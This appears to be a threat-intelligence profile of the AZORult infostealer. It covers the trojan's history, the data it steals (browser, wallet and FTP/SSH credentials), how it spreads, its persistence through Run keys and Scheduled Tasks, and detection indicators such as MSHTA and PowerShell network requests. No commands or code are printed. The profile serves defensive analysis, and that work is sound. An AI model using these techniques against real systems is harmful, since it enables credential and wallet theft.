AZORult's Year Activity
AZORult is an infostealer trojan which has been used in the wild since early 2016. It has received multiple updates over the years, and is still being actively used in 2020. Initial versions were created in Delphi; later versions are now written in C++.
Initial versions of the family featured no persistence mechanism, and deleted itself from the infected system after harvesting and exfiltrating useful personal data. Later updates have added persistence mechanisms, including via Scheduled Tasks and registry Run keys.
It can steal data from a range of sources, including:
- Various web browsers
- Email clients
- Cryptocurrency wallets (Bitcoin, Electrum, Etherium, etc.)
- Common communication software (Telegram, Skype, Pidgin Messenger etc.)
- Steam game client
- FTP/SSH credentials (FileZilla, WinSCP, etc.)
Samples are often distributed via malicious Office documents, though other methods including fake VPN downloads have also been observed.
At the end of 2018 the main seller of AZORult announced the discontinuation of the trojan’s development and closed sales. However in early 2019 a new version appeared online written in C++ rather than the original Delphi, apparently created by part of the initial development team. This version is sometimes referred to as AZORult++.
This newer version includes some additional features over the original, such as Remote Desktop Connection (RDP) to infected machines.
Triage processes the payload during analysis to extract the C2 URL/IP, making it visible even if execution fails or the C2 is now inactive.
Over time some persistence methods have been added to versions of AZORult. This generally includes a Run key in registry pointing to a loader script, either locally or remotely:
Some samples make use of tools like schtasks to create Scheduled Tasks to launch the loader script:
- Excel spawns unexpected process (MSHTA.exe)
- MSHTA and Powershell make network requests
- Persistence via Run keys and Scheduled Tasks
- Uses Pastebin for payload download (depends on infection method)
Listing of relevant open-source blogposts, yara rules etc.
Details of all TTPs associated with the family's activity.